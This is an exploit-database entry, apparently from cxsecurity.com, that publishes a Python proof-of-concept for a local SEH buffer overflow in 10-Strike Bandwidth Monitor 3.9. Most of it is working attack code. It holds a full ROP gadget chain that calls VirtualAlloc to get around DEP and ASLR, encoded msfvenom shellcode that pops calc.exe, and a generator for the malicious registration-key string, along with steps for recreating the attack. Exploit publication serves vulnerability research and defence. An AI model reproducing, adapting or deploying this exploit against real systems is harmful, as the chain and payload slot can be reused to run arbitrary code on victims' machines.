10-Strike Bandwidth Monitor 3.9 Buffer Overflow

2020.06.08
Credit: Bobby Cooke
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR) # Exploit Author: Bobby Cooke # Date: June 7th, 2020 # Vendor Site: https://www.10-strike.com/ # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe # Tested On: Windows 10 - Pro 1909 (x86) # Version: version 3.9 # Exploit Details: # 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection. # 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time. # - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692 # 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR. # 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP. # 5. Pass execution to shellcode and PopCalc. # - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer # Recreate: # Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart # Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename # ------------------------------------------------------------------------------------------- # 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll] # 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe] # 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll] # ------------------------------------------------------------------------------------------- import struct OS_retSled = '\x41'*400 retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ} # EAX 110E7198 <&KERNEL32.VirtualAlloc> # ECX 00000040 # EDX 00001000 # EBX 00000001 # ESP 0014EAA4 # EBP 1202EF02 ssleay32.1202EF02 # ESI 110495EF LIBEAY32.110495EF # EDI 01225803 BandMoni.01225803 # EIP 76C647D0 KERNEL32.VirtualAlloc # 0014EAA0 110495EF .... LIBEAY32.110495EF # 0014EAA4 1202EF02 .... /CALL to VirtualAlloc # 0014EAA8 0014EABC .... |Address = 0014EABC # 0014EAAC 00000001 .... |Size = 1 # 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT # 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE # 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc> # 0014EABC 110843B4 .C.. LIBEAY32.110843B4 # 0014EAC0 90909090 .... def createRopChain(): # rop chain generated with mona.py - www.corelan.be ropGadgets = [ 0x1202ef02, # POP EBP # RETN [ssleay32.dll] 0x1202ef02, # skip 4 bytes [ssleay32.dll] 0x01215f16, # POP EBX # RETN [BandMonitor.exe] 0xffffffff, # 0x012175f5, # INC EBX # RETN [BandMonitor.exe] 0x01056ff7, # INC EBX # RETN [BandMonitor.exe] 0x011e94d4, # POP EDX # RETN [BandMonitor.exe] 0xffffefff, # Value to negate, destination value : 0x00001000 0x01218952, # NEG EDX # RETN [BandMonitor.exe] 0x011ead1b, # DEC EDX # RETN [BandMonitor.exe] 0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll] 0xffffffff, # 0x11016023, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1101597d, # INC ECX # RETN [LIBEAY32.dll] 0x1202fe55, # POP EDI # RETN [ssleay32.dll] 0x01225803, # RETN (ROP NOP) [BandMonitor.exe] 0x1105ed16, # POP ESI # RETN [LIBEAY32.dll] 0x110495ef, # JMP [EAX] [LIBEAY32.dll] 0x012126f5, # POP EAX # RETN [BandMonitor.exe] 0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll] 0x110762c4, # PUSHAD # RETN [LIBEAY32.dll] 0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll] ] return ''.join(struct.pack('<I', _) for _ in ropGadgets) ropChain = createRopChain() nopSled = '\x90'*100 # boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows # x86/shikata_ga_nai chosen with final size 220 shellcode = b"" shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4" shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f" shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9" shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13" shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89" shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80" shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79" shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c" shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9" shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99" shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc" shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46" shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b" shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8" shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18" shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51" shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb" shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f" shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d" shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70" OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode)) nSEH = '\x44'*4 # Stack pivot offset to controllable buffer: 1408 (0x580) bytes SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810} extra = '\x44'*2000 buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra File = 'poc.txt' try: payload = buffer f = open(File, 'w') f.write(payload) f.close() print File + " created successfully" except: print File + ' failed to create'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top